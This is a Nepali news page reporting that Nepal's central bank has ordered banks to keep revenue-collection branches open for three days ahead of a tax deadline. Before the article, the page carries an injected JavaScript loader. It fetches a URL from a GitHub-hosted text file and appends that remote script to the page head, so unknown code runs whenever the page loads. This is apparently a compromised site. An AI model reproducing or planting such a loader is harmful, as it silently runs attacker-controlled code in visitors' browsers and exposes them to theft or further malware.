;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); तीन दिनसम्म बैंकका शाखा खोल्न राष्ट्र बैंकको निर्देशन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • तीन दिनसम्म बैंकका शाखा खोल्न राष्ट्र बैंकको निर्देशन
समाचार

तीन दिनसम्म बैंकका शाखा खोल्न राष्ट्र बैंकको निर्देशन

भदौ २३,

काठमाडौं । आजबाट तीन दिनसम्म बैंक तथा वित्तीय संस्थाका राजश्व संकलन हुने सबै शाखा तथा काउन्टर खुल्ने भएका छन्।

नेपाल राष्ट्र बैंकको बैंक तथा वित्तीय संस्था नियमन विभागले बैंकहरुलाई राजश्व संकलनका लागि ३ दिन सबै शाखा तथा काउन्टरहरु खुला गर्न निर्देशन दिएको हो। सरकारले भदौ २५ सम्म राजश्व तिरिसक्न करदाताहरुलाई भनेको छ।

राजश्व उठाउने म्याद २५ गतेसम्म भएका कारण बैंकका शाखाहरु खुला गर्न निर्देशन दिइएको राष्ट्र बैंकले जनाएको छ।file Photo

फेसबुक प्रतिक्रियाहरु